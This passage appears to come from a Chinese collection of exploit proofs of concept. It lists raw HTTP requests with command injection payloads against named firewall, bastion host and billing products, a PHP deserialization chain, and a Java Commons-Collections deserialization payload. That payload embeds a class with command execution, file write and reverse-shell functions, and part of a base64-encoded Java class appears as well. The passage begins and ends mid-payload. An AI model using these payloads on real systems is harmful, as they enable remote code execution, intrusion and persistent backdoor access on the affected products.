VTFrRnV3QXVXUmtPdnJjQUwxTzJBQ05YR1F5MkFBa1NOd1M5QUNCWkF4a1BVN1lBSVJrTUJMMEFJbGtER1FkVHRnQWpWNmNBWWpvUEtoSTV0Z0F4T2hBWkVCSTZCTDBBSUZrRHNnQTB4d0FQRWpXNEFDZFpzd0EwcHdBR3NnQTBVN1lBTmhrUUJMMEFJbGtER1E1VHRnQWpPZ2NaRExZQUNSSTNCTDBBSUZrREdSQlR0Z0FoR1F3RXZRQWlXUU1aQjFPMkFDTlhwd0FYaEFrQnAvNVNwd0FJT2dhbkFBT0VCQUduL1Z5eEFBZ0Fsd0NpQUtVQUZ3REZBTk1BMWdBWEFkQUNWd0phQURnQU5nQTdBc1VBT0FBK0FGa0N4UUE0QUZ3QWZBTEZBRGdBZndLNUFzVUFPQUs4QXNJQ3hRQTRBQUVBaGdBQUFPNEFPd0FBQUEwQUJBQU9BQXNBRHdBVkFCQUFHZ0FSQUNZQUV3QXdBQlFBTmdBV0FENEFGd0JGQUJnQVhBQVpBR2NBR2dCc0FCc0FkQUFjQUg4QUhRQ0tBQjRBandBZkFKY0FJUUNpQUNRQXBRQWlBS2NBSXdDNEFDVUF2UUFtQU1VQUtBRFRBQ3NBMWdBcEFOZ0FLZ0RqQUN3QTZBQXRBUEFBTGdEN0FDOEJBQUF3QVE0QU1RRWRBRElCS0FBekFUTUFOQUU0QURVQlFBQTJBVmtBTndHU0FEZ0Jsd0E1QVpvQU93R2xBRHdCMEFBK0FkZ0FQd0hmQUVBQ05RQkJBbGNBUmdKYUFFSUNYQUJEQW1RQVJBS1hBRVVDdVFCSEFyd0FNUUxDQUVzQ3hRQkpBc2NBU2dMS0FCTUMwQUJOQUljQUFBQUVBQUVBT0FBQkFJZ0FpUUFDQUlVQUFBQTVBQUlBQXdBQUFCRXJ1QUFCc0UyNEFBZTJBRHNydGdBOHNBQUJBQUFBQkFBRkFBSUFBUUNHQUFBQURnQURBQUFBVndBRkFGZ0FCZ0JaQUljQUFBQUVBQUVBQWdBQkFJb0Fpd0FCQUlVQUFBQ1BBQVFBQXdBQUFGY3J4Z0FNRWowcnRnQSttUUFHRWord0s3WUFRRXdyRWtHMkFFS1pBQ2dyRWtFU1BiWUFReEpFdGdCRlRTeStCWjhBQmhKR3NDb3NBeklzQkRLNEFFZTJBRWl3S2lzU1FSSTl0Z0JERWtrU1BiWUFRN1lBU3JBQUFBQUJBSVlBQUFBbUFBa0FBQUJqQUEwQVpBQVFBR1lBRlFCbkFCNEFhUUFzQUdvQU1nQnJBRFVBYlFCREFHOEFBUUNNQUlzQUFRQ0ZBQUFCeWdBRUFBa0FBQUVxRWt1NEFFeTJBRTFOSzdZQVFFd0JUZ0U2QkN3U1RyWUFFWmtBUUNzU1Q3WUFFWmtBSUNzU1VMWUFFWm9BRjdzQVVWbTNBRklydGdCVEVsUzJBRk8yQUZWTUJyMEFLVmtERWloVFdRUVNWbE5aQlN0VE9nU25BRDByRWsrMkFCR1pBQ0FyRWxDMkFCR2FBQmU3QUZGWnR3QlNLN1lBVXhKWHRnQlR0Z0JWVEFhOUFDbFpBeEpZVTFrRUVsbFRXUVVyVXpvRXVBQmFHUVMyQUZ0T3V3QmNXUzIyQUYyM0FGNFNYN1lBWURvRkdRVzJBR0daQUFzWkJiWUFZcWNBQlJJOU9nYTdBRnhaTGJZQVk3Y0FYaEpmdGdCZ09nVzdBRkZadHdCU0dRYTJBRk1aQmJZQVlaa0FDeGtGdGdCaXB3QUZFajIyQUZPMkFGVTZCaGtHT2djdHhnQUhMYllBWkJrSHNEb0ZHUVcyQUdVNkJpM0dBQWN0dGdCa0dRYXdPZ2d0eGdBSExiWUFaQmtJdndBRUFKTUEvZ0VKQURnQWt3RCtBUjBBQUFFSkFSSUJIUUFBQVIwQkh3RWRBQUFBQVFDR0FBQUFiZ0FiQUFBQWN3QUpBSFFBRGdCMUFCQUFkZ0FUQUhjQUhBQjRBQzRBZVFCQ0FIc0FXUUI5QUdzQWZnQi9BSUFBa3dDREFKd0FoQUN1QUlVQXdnQ0dBTlFBaHdENkFJZ0EvZ0NNQVFJQWpRRUdBSWdCQ1FDSkFRc0FpZ0VTQUl3QkZnQ05BUm9BaWdFZEFJd0JJd0NOQUFFQWpRQ09BQUVBaFFBQUFZTUFCQUFNQUFBQTh4Skx1QUJNdGdCTkVrNjJBQkdhQUJDN0FDbFpFbWEzQUdkT3B3QU51d0FwV1JKb3R3Qm5UcmdBV2kyMkFHazZCTHNBYWxrckxMWUFhN2NBYkRvRkdRUzJBRjA2QmhrRXRnQmpPZ2NaQmJZQWJUb0lHUVMyQUc0NkNSa0Z0Z0J2T2dvWkJiWUFjSm9BWUJrR3RnQnhuZ0FRR1FvWkJyWUFjcllBYzZmLzdoa0h0Z0J4bmdBUUdRb1pCN1lBY3JZQWM2Zi83aGtJdGdCeG5nQVFHUWtaQ0xZQWNyWUFjNmYvN2hrS3RnQjBHUW0yQUhRVUFIVzRBSGNaQkxZQWVGZW5BQWc2QzZmL25oa0V0Z0JrR1FXMkFIbW5BQ0JPdXdCUldiY0FVaEo2dGdCVExiWUFlN1lBVXhKOHRnQlR0Z0JWc0JKOXNBQUNBTGdBdmdEQkFEZ0FBQURRQU5NQU9BQUJBSVlBQUFCdUFCc0FBQUNiQUJBQW5BQWRBSjRBSndDZ0FEQUFvUUErQUtJQVV3Q2pBR0VBcEFCcEFLVUFjUUNtQUg0QXFBQ0dBS2tBa3dDckFKc0FyQUNvQUs0QXJRQ3ZBTElBc0FDNEFMSUF2Z0N6QU1FQXRBRERBTFVBeGdDM0FNc0F1QURRQUxzQTB3QzVBTlFBdWdEd0FMd0FDQUNQQUlrQUFnQ0ZBQUFBTWdBREFBSUFBQUFTS3JnQUFiQk11d0FEV1N1MkFBUzNBQVcvQUFFQUFBQUVBQVVBQWdBQkFJWUFBQUFHQUFFQUFBQTNBSUVBQUFBQUFBRUFrQUFBQUFJQWtRPT0iOwpjbHogPSBkZWZpbmVDbGFzcyhiYXNlNjREZWNvZGVUb0J5dGUoY29kZSkpOwpjbHoubmV3SW5zdGFuY2UoKTt0AARldmFsdXEAfgAbAAAAAXEAfgAjc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg=)}} |
| 安恒-下一代防火墙-RCE | GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix=%60id+%3E/usr/local/webui/frrgkquigh.txt%60 HTTP/1.1 Host: xx.xx.xx.xx:9099 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 |
| 绿盟 SAS堡垒机 Exec 远程命令执行漏洞 | GET /webconf/Exec/index?cmd=id HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=4b250694b3e8973d81aaa03eefc85509 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Te: trailers Connection: close |
| 深信服-下一代防火墙-RCE | POST /cgi-bin/login.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 Connection: close Content-Length: 112 Content-Type: Application/X-www-Form Cookie: PHPSESSID=`$(echo 156828301~ > /fwlib/sys/virus/webui/svpn_html/qwer.txt)`; Accept-Encoding: gzip {\”opr\”:\”login\”, \”data\”:{\”user\”: \”watchTowr\” , \”pwd\”: \”watchTowr\” , \”vericode\”: \”EINW\” , \”privacy_enable\”: \”0\”}} |
| wechat 3.9.11.25 self rce | 未知 |
| 深澜计费管理系统strategy存在反序列化漏洞 | POST /strategy/ip/bind-ip HTTP/2 Host: Cookie: lang=zh-CN; PHPSESSID_8080=f434cd5f5e9befe38ab3d688b49eacb5; _csrf-8080=515a2ce1d579e3eb33de0fb00d2eddb40cbfb5db938eb248ddaa2069ed9ba803a%3A2%3A%7Bi%3A0%3Bs%3A10%3A%22_csrf-8080%22%3Bi%3A1%3Bs%3A32%3A%22zKeB2l7C4-gTmKM4dulmKqnWGCnlHFDP%22%3B%7D Cache-Control: max-age=0 Sec-Ch-Ua: “Not A(Brand”;v=”99″, “Google Chrome”;v=”121″, “Chromium”;v=”121″ Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: “Windows” Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Content-Length: 1265 data1=O%3A33%3A%22setasign%5CFpdi%5CPdfReader%5CPdfReader%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00parser%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A12%3A%7B |
| 用友NC-UserAuthenticationServlet存在反序列化漏洞 | POST /servlet/~uapim/nc.bs.pub.im.UserAuthenticationServlet HTTP/1.1 Host: Cmd: id Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 {{unquote(“\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x07sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00*org.mozilla.javascript.DefiningClassLoader\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x01ur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00t\x00\x16getDeclaredConstructoruq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x1asq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00t\x00\x0bnewInstanceuq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x18sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x02t\x00\x02A4ur\x00\x02[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\x00\x00xp\x00\x00\x1b\xbb\xca\xfe\xba\xbe\x00\x00\x001\x01\x9a\x0a\x00\x1e\x00\xad\x0a\x00C\x00\xae\x0a\x00C\x00\xaf\x0a\x00\x1e\x00\xb0\x08\x00\xb1\x0a\x00\x1c\x00\xb2\x0a\x00\xb3\x00\xb4\x0a\x00\xb3\x00\xb5\x07\x00\xb6\x0a\x00C\x00\xb7\x08\x00\xa5\x0a\x00!\x00\xb8\x08\x00\xb9\x08\x00\xba\x07\x00\xbb\x08\x00\xbc\x08\x00\xbd\x07\x00\xbe\x0a\x00\x1c\x00\xbf\x08\x00\xc0\x08\x00\xc1\x07\x00\xc2\x0b\x00\x16\x00\xc3\x0b\x00\xc4\x00\xc5\x0b\x00\xc4\x00\xc6\x08\x00\xc7\x08\x00\xc8\x07\x00\xc9\x0a\x00\x1c\x00\xca\x07\x00\xcb\x0a\x00\xcc\x00\xcd\x08\x00\xce\x07\x00\xcf\x08\x00\xd0\x0a\x00\x8f\x00\xd1\x0a\x00!\x00\xd2\x08\x00\xd3\x09\x00\xd4\x00\xd5\x0a\x00\xd4\x00\xd6\x08\x00\xd7\x0a\x00\x8f\x00\xd8\x0a\x00\x1c\x00\xd9\x08\x00\xda\x07\x00\xdb\x0a\x00\x1c\x00\xdc\x08\x00\xdd\x07\x00\xde\x08\x00\xdf\x08\x00\xe0\x0a\x00\x1c\x00\xe1\x07\x00\xe2\x0a\x00C\x00\xe3\x0a\x00\xe4\x00\xd8\x08\x00\xe5\x0a\x00!\x00\xe6\x08\x00\xe7\x0a\x00!\x00\xe8\x08\x00\xe9\x0a\x00!\x00\xea\x0a\x00\x8f\x00\xeb\x08\x00\xec\x0a\x00!\x00\xed\x08\x00\xee\x09\x00\x8f\x00\xef\x0a\x00\xd4\x00\xf0\x09\x00\x8f\x00\xf1\x07\x00\xf2\x0a\x00C\x00\xf3\x0a\x00C\x00\xf4\x08\x00\xa6\x08\x00\xf5\x08\x00\xf6\x0a\x00\x8f\x00\xf7\x08\x00\xf8\x0a\x00\x8f\x00\xf9\x07\x00\xfa\x0a\x00L\x00\xfb\x07\x00\xfc\x0a\x00N\x00\xfd\x0a\x00\x8f\x00\xfe\x0a\x00N\x00\xff\x0a\x00N\x01\x00\x0a\x00N\x01\x01\x0a\x00/\x01\x02\x0a\x00L\x01\x03\x0a\x00!\x01\x04\x08\x01\x05\x0a\x01\x06\x01\x07\x0a\x00!\x01\x08\x08\x01\x09\x08\x01\x0a\x08\x01\x0b\x07\x01\x0c\x0a\x00]\x00\xad\x0a\x00]\x01\x0d\x08\x01\x0e\x0a\x00]\x01\x02\x08\x01\x0f\x08\x01\x10\x08\x01\x11\x08\x01\x12\x0a\x01\x13\x01\x14\x0a\x01\x13\x01\x15\x07\x01\x16\x0a\x01\x17\x01\x18\x0a\x00h\x01\x19\x08\x01\x1a\x0a\x00h\x01\x1b\x0a\x00h\x00\xc5\x0a\x00h\x01\x1c\x0a\x01\x17\x01\x1d\x0a\x01\x17\x01\x1e\x08\x01\x1f\x08\x01 \x0a\x01\x13\x01!\x07\x01\”\x0a\x00t\x01#\x0a\x00t\x01\x18\x0a\x01\x17\x01$\x0a\x00t\x01$\x0a\x00t\x01%\x0a\x01&\x01’\x0a\x01&\x01\x28\x0a\x01\x29\x01*\x0a\x01\x29\x01\x00\x05\x00\x00\x00\x00\x00\x00\x002\x0a\x00C\x01+\x0a\x01\x17\x01,\x0a\x00t\x01\x01\x08\x01-\x0a\x00/\x01.\x08\x01/\x08\x010\x0a\x00\xd4\x011\x0a\x00\x8f\x012\x08\x013\x08\x014\x08\x015\x08\x016\x08\x00\xa9\x08\x017\x07\x018\x01\x00\x0cBASE64_CHARS\x01\x00\x12Ljava/lang/String;\x01\x00\x0dConstantValue\x08\x019\x01\x00\x02ip\x01\x00\x04port\x01\x00\x13Ljava/lang/Integer;\x01\x00\x06<init>\x01\x00\x03\x28\x29V\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x01\x00\x0aExceptions\x01\x00\x09loadClass\x01\x00%\x28Ljava/lang/String;\x29Ljava/lang/Class;\x01\x00\x09Signature\x01\x00\x28\x28Ljava/lang/String;\x29Ljava/lang/Class<*>;\x01\x00\x05proxy\x01\x00&\x28Ljava/lang/String;\x29Ljava/lang/String;\x01\x00\x05write\x01\x008\x28Ljava/lang/String;Ljava/lang/String;\x29Ljava/lang/String;\x01\x00\x0aclearParam\x01\x00\x04exec\x01\x00\x07reverse\x01\x00’\x28Ljava/lang/String;I\x29Ljava/lang/String;\x01\x00\x03run\x01\x00\x06decode\x01\x00\x16\x28Ljava/lang/String;\x29[B\x01\x00\x0aSourceFile\x01\x00\x07A4.java\x0c\x00\x97\x00\x98\x0c\x01:\x01;\x0c\x01<\x01=\x0c\x01>\x01?\x01\x00\x07threads\x0c\x01@\x01A\x07\x01B\x0c\x01C\x01D\x0c\x01E\x01F\x01\x00\x13[Ljava/lang/Thread;\x0c\x01G\x01H\x0c\x01I\x01J\x01\x00\x04http\x01\x00\x06target\x01\x00\x12java/lang/Runnable\x01\x00\x06this$0\x01\x00\x07handler\x01\x00\x1ejava/lang/NoSuchFieldException\x0c\x01K\x01?\x01\x00\x06global\x01\x00\x0aprocessors\x01\x00\x0ejava/util/List\x0c\x01L\x01M\x07\x01N\x0c\x01O\x01P\x0c\x01Q\x01R\x01\x00\x03req\x01\x00\x0bgetResponse\x01\x00\x0fjava/lang/Class\x0c\x01S\x01T\x01\x00\x10java/lang/Object\x07\x01U\x0c\x01V\x01W\x01\x00\x09getHeader\x01\x00\x10java/lang/String\x01\x00\x03cmd\x0c\x00\xa0\x00\xa1\x0c\x01X\x01Y\x01\x00\x09setStatus\x07\x01Z\x0c\x01[\x01\\\x0c\x01]\x01^\x01\x00$org.apache.tomcat.util.buf.ByteChunk\x0c\x00\x9c\x00\x9d\x0c\x01_\x01R\x01\x00\x08setBytes\x01\x00\x02[B\x0c\x01`\x01T\x01\x00\x07doWrite\x01\x00\x13java/lang/Exception\x01\x00\x13java.nio.ByteBuffer\x01\x00\x04wrap\x0c\x01a\x00\x9d\x01\x00 java/lang/ClassNotFoundException\x0c\x01b\x01c\x07\x01d\x01\x00\x00\x0c\x01e\x01f\x01\x00\x10command not null\x0c\x01g\x01H\x01\x00\x05#####\x0c\x01h\x01i\x0c\x00\xa4\x00\xa1\x01\x00\x01:\x0c\x01j\x01k\x01\x00\”command reverse host format error!\x0c\x00\x94\x00\x91\x0c\x01l\x01m\x0c\x00\x95\x00\x96\x01\x00\x10java/lang/Thread\x0c\x00\x97\x01n\x0c\x01o\x00\x98\x01\x00\x05$$$$$\x01\x00\x12file format error!\x0c\x00\xa2\x00\xa3\x01\x00\x05@@@@@\x0c\x00\xa5\x00\xa1\x01\x00\x0cjava/io/File\x0c\x00\x97\x01p\x01\x00\x18java/io/FileOutputStream\x0c\x00\x97\x01q\x0c\x00\xa9\x00\xaa\x0c\x00\xa2\x01r\x0c\x01s\x00\x98\x0c\x01t\x00\x98\x0c\x01u\x01H\x0c\x01v\x01H\x0c\x01w\x01x\x01\x00\x07os.name\x07\x01y\x0c\x01z\x00\xa1\x0c\x01\x7b\x01H\x01\x00\x03win\x01\x00\x04ping\x01\x00\x02-n\x01\x00\x17java/lang/StringBuilder\x0c\x01|\x01\x7d\x01\x00\x05 -n 4\x01\x00\x02/c\x01\x00\x05 -t 4\x01\x00\x02sh\x01\x00\x02-c\x07\x01~\x0c\x01\x7f\x01\x80\x0c\x00\xa5\x01\x81\x01\x00\x11java/util/Scanner\x07\x01\x82\x0c\x01\x83\x01\x84\x0c\x00\x97\x01\x85\x01\x00\x02\\a\x0c\x01\x86\x01\x87\x0c\x01Q\x01H\x0c\x01\x88\x01\x84\x0c\x01\x89\x00\x98\x01\x00\x07/bin/sh\x01\x00\x07cmd.exe\x0c\x00\xa5\x01\x8a\x01\x00\x0fjava/net/Socket\x0c\x00\x97\x01\x8b\x0c\x01\x8c\x01\x8d\x0c\x01\x8e\x01P\x07\x01\x8f\x0c\x01\x90\x01\x91\x0c\x01\x92\x01\x91\x07\x01\x93\x0c\x00\xa2\x01\x94\x0c\x01\x95\x01\x96\x0c\x01\x97\x01\x91\x01\x00\x1dreverse execute error, msg ->\x0c\x01\x98\x01H\x01\x00\x01!\x01\x00\x13reverse execute ok!\x0c\x01\x99\x01\x91\x0c\x00\xa6\x00\xa7\x01\x00\x16sun.misc.BASE64Decoder\x01\x00\x0cdecodeBuffer\x01\x00\x10java.util.Base64\x01\x00\x0agetDecoder\x01\x00&org.apache.commons.codec.binary.Base64\x01\x00\x02A4\x01\x00@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x01\x00\x0dcurrentThread\x01\x00\x14\x28\x29Ljava/lang/Thread;\x01\x00\x0egetThreadGroup\x01\x00\x19\x28\x29Ljava/lang/ThreadGroup;\x01\x00\x08getClass\x01\x00\x13\x28\x29Ljava/lang/Class;\x01\x00\x10getDeclaredField\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/reflect/Field;\x01\x00\x17java/lang/reflect/Field\x01\x00\x0dsetAccessible\x01\x00\x04\x28Z\x29V\x01\x00\x03get\x01\x00&\x28Ljava/lang/Object;\x29Ljava/lang/Object;\x01\x00\x07getName\x01\x00\x14\x28\x29Ljava/lang/String;\x01\x00\x08contains\x01\x00\x1b\x28Ljava/lang/CharSequence;\x29Z\x01\x00\x0dgetSuperclass\x01\x00\x08iterator\x01\x00\x16\x28\x29Ljava/util/Iterator;\x01\x00\x12java/util/Iterator\x01\x00\x07hasNext\x01\x00\x03\x28\x29Z\x01\x00\x04next\x01\x00\x14\x28\x29Ljava/lang/Object;\x01\x00\x09getMethod\x01\x00@\x28Ljava/lang/String;[Ljava/lang/Class;\x29Ljava/lang/reflect/Method;\x01\x00\x18java/lang/reflect/Method\x01\x00\x06invoke\x01\x009\x28Ljava/lang/Object;[Ljava/lang/Object;\x29Ljava/lang/Object;\x01\x00\x08getBytes\x01\x00\x04\x28\x29[B\x01\x00\x11java/lang/Integer\x01\x00\x04TYPE\x01\x00\x11Ljava/lang/Class;\x01\x00\x07valueOf\x01\x00\x16\x28I\x29Ljava/lang/Integer;\x01\x00\x0bnewInstance\x01\x00\x11getDeclaredMethod\x01\x00\x07forName\x01\x00\x15getContextClassLoader\x01\x00\x19\x28\x29Ljava/lang/ClassLoader;\x01\x00\x15java/lang/ClassLoader\x01\x00\x06equals\x01\x00\x15\x28Ljava/lang/Object;\x29Z\x01\x00\x04trim\x01\x00\x0astartsWith\x01\x00\x15\x28Ljava/lang/String;\x29Z\x01\x00\x05split\x01\x00’\x28Ljava/lang/String;\x29[Ljava/lang/String;\x01\x00\x08parseInt\x01\x00\x15\x28Ljava/lang/String;\x29I\x01\x00\x17\x28Ljava/lang/Runnable;\x29V\x01\x00\x05start\x01\x00\x15\x28Ljava/lang/String;\x29V\x01\x00\x11\x28Ljava/io/File;\x29V\x01\x00\x05\x28[B\x29V\x01\x00\x05flush\x01\x00\x05close\x01\x00\x08toString\x01\x00\x0fgetAbsolutePath\x01\x00\x07replace\x01\x00D\x28Ljava/lang/CharSequence;Ljava/lang/CharSequence;\x29Ljava/lang/String;\x01\x00\x10java/lang/System\x01\x00\x0bgetProperty\x01\x00\x0btoLowerCase\x01\x00\x06append\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/StringBuilder;\x01\x00\x11java/lang/Runtime\x01\x00\x0agetRuntime\x01\x00\x15\x28\x29Ljava/lang/Runtime;\x01\x00\x28\x28[Ljava/lang/String;\x29Ljava/lang/Process;\x01\x00\x11java/lang/Process\x01\x00\x0egetInputStream\x01\x00\x17\x28\x29Ljava/io/InputStream;\x01\x00\x18\x28Ljava/io/InputStream;\x29V\x01\x00\x0cuseDelimiter\x01\x00’\x28Ljava/lang/String;\x29Ljava/util/Scanner;\x01\x00\x0egetErrorStream\x01\x00\x07destroy\x01\x00’\x28Ljava/lang/String;\x29Ljava/lang/Process;\x01\x00\x16\x28Ljava/lang/String;I\x29V\x01\x00\x0fgetOutputStream\x01\x00\x18\x28\x29Ljava/io/OutputStream;\x01\x00\x08isClosed\x01\x00\x13java/io/InputStream\x01\x00\x09available\x01\x00\x03\x28\x29I\x01\x00\x04read\x01\x00\x14java/io/OutputStream\x01\x00\x04\x28I\x29V\x01\x00\x05sleep\x01\x00\x04\x28J\x29V\x01\x00\x09exitValue\x01\x00\x0agetMessage\x01\x00\x08intValue\x00!\x00\x8f\x00\x1e\x00\x01\x00\x0f\x00\x03\x00\x1a\x00\x90\x00\x91\x00\x01\x00\x92\x00\x00\x00\x02\x00\x93\x00\x02\x00\x94\x00\x91\x00\x00\x00\x02\x00\x95\x00\x96\x00\x00\x00\x09\x00\x01\x00\x97\x00\x98\x00\x02\x00\x99\x00\x00\x03\xb6\x00\x06\x00\x13\x00\x00\x02\x8e*\xb7\x00\x01\xb8\x00\x02\xb6\x00\x03L+\xb6\x00\x04\x12\x05\xb6\x00\x06M,\x04\xb6\x00\x07,+\xb6\x00\x08\xc0\x00\x09\xc0\x00\x09N-:\x04\x19\x04\xbe6\x05\x036\x06\x15\x06\x15\x05\xa2\x02X\x19\x04\x15\x062:\x07\x19\x07\xc7\x00\x06\xa7\x02C\x19\x07\xb6\x00\x0a:\x08\x19\x08\x12\x0b\xb6\x00\x0c\x9a\x00\x0d\x19\x08\x12\x0d\xb6\x00\x0c\x9a\x00\x06\xa7\x02%\x19\x07\xb6\x00\x04\x12\x0e\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x07\xb6\x00\x08:\x09\x19\x09\xc1\x00\x0f\x9a\x00\x06\xa7\x02\x02\x19\x09\xb6\x00\x04\x12\x10\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\x12\x11\xb6\x00\x06M\xa7\x00\x16:\x0a\x19\x09\xb6\x00\x04\xb6\x00\x13\xb6\x00\x13\x12\x11\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\xb6\x00\x13\x12\x14\xb6\x00\x06M\xa7\x00\x10:\x0a\x19\x09\xb6\x00\x04\x12\x14\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\x12\x15\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08\xc0\x00\x16\xc0\x00\x16:\x0a\x19\x0a\xb9\x00\x17\x01\x00:\x0b\x19\x0b\xb9\x00\x18\x01\x00\x99\x01[\x19\x0b\xb9\x00\x19\x01\x00:\x0c\x19\x0c\xb6\x00\x04\x12\x1a\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x0c\xb6\x00\x08:\x0d\x19\x0d\xb6\x00\x04\x12\x1b\x03\xbd\x00\x1c\xb6\x00\x1d\x19\x0d\x03\xbd\x00\x1e\xb6\x00\x1f:\x0e\x19\x0d\xb6\x00\x04\x12 \x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d\x19\x0d\x04\xbd\x00\x1eY\x03\x12\”S\xb6\x00\x1f\xc0\x00!:\x0f\x19\x0f\xc7\x00\x06\xa7\xff\x91*\x19\x0f\xb6\x00#\xb6\x00$:\x10\x19\x0e\xb6\x00\x04\x12%\x04\xbd\x00\x1cY\x03\xb2\x00&S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x11\x00\xc8\xb8\x00’S\xb6\x00\x1fW*\x12\x28\xb6\x00\x29:\x11\x19\x11\xb6\x00*:\x09\x19\x11\x12+\x06\xbd\x00\x1cY\x03\x12,SY\x04\xb2\x00&SY\x05\xb2\x00&S\xb6\x00-\x19\x09\x06\xbd\x00\x1eY\x03\x19\x10SY\x04\x03\xb8\x00’SY\x05\x19\x10\xbe\xb8\x00’S\xb6\x00\x1fW\x19\x0e\xb6\x00\x04\x12.\x04\xbd\x00\x1cY\x03\x19\x11S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x19\x09S\xb6\x00\x1fW\xa7\x00O:\x11*\x120\xb6\x00\x29:\x12\x19\x12\x121\x04\xbd\x00\x1cY\x03\x12,S\xb6\x00-\x19\x12\x04\xbd\x00\x1eY\x03\x19\x10S\xb6\x00\x1f:\x09\x19\x0e\xb6\x00\x04\x12.\x04\xbd\x00\x1cY\x03\x19\x12S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x19\x09S\xb6\x00\x1fW\xa7\x00\x0e\xa7\x00\x05:\x08\x84\x06\x01\xa7\xfd\xa7\xb1\x00\x07\x00\xa0\x00\xab\x00\xae\x00\x12\x00\xce\x00\xdc\x00\xdf\x00\x12\x01\xc4\x020\x023\x00/\x00?\x00D\x02\x85\x00/\x00G\x00b\x02\x85\x00/\x00e\x00\x85\x02\x85\x00/\x00\x88\x02\x7f\x02\x85\x00/\x00\x01\x00\x9a\x00\x00\x00\xde\x007\x00\x00\x00\x17\x00\x04\x00\x18\x00\x0b\x00\x19\x00\x15\x00\x1a\x00\x1a\x00\x1b\x00&\x00\x1d\x00?\x00\x1f\x00G\x00 